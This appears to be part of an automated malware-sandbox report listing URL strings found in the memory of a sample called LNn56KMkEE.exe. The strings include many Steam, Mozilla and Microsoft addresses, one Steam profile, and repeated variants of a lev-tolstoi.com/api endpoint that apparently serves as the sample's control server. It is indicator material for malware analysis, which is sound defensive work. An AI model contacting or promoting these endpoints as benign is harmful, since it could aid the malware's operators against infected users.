                Source: LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: LNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000003.1843859744.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843320427.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843924713.000000000589B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: LNn56KMkEE.exe, 00000000.00000003.1843859744.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843320427.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843987961.0000000005891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: LNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: LNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: LNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: LNn56KMkEE.exeString found in binary or memory: https://help.steampowered.c
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: LNn56KMkEE.exe, 00000000.00000003.1843320427.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843924713.000000000589B000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843987961.0000000005891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: LNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929021676.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872487701.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1887045609.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924201177.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1798241314.0000000005895000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924363076.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1798154813.0000000005895000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752668180.0000000000FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/(a
                Source: LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/V7
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752624907.000000000101F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api/
                Source: LNn56KMkEE.exe, 00000000.00000002.1931358953.0000000005880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiD;
                Source: LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.000000000101F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apip
                Source: LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiq
                Source: LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiy
                Source: LNn56KMkEE.exe, 00000000.00000003.1872487701.0000000001075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/es~7
                Source: LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1887045609.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924201177.0000000001075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/n7
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752624907.000000000101F000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1887045609.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924201177.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.000000000101F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: LNn56KMkEE.exe, 00000000.00000003.1872487701.0000000001075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/s
                Source: LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847242984.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846708407.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872487701.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1887045609.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924201177.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846753898.0000000001073000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/vo0~
                Source: LNn56KMkEE.exe, 00000000.00000002.1929359767.000000000105D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1886865197.000000000105D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774699395.000000000106A000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774699395.000000000106A000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774699395.000000000106A000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: LNn56KMkEE.exe, 00000000.00000003.1776196742.00000000058E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: LNn56KMkEE.exe, 00000000.00000003.1819509405.000000000599F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: LNn56KMkEE.exe, 00000000.00000003.1819509405.000000000599F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: LNn56KMkEE.exe, 00000000.00000003.1798001188.00000000058DF000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1776244890.00000000058DE000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1798274391.00000000058DF000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1798111491.00000000058DF000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1776196742.00000000058E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: LNn56KMkEE.exe, 00000000.00000003.1776244890.00000000058BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: LNn56KMkEE.exe, 00000000.00000003.1798001188.00000000058DF000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1776244890.00000000058DE000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1798274391.00000000058DF000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1798111491.00000000058DF000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1776196742.00000000058E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: LNn56KMkEE.exe, 00000000.00000003.1776244890.00000000058BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: LNn56KMkEE.exeString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575
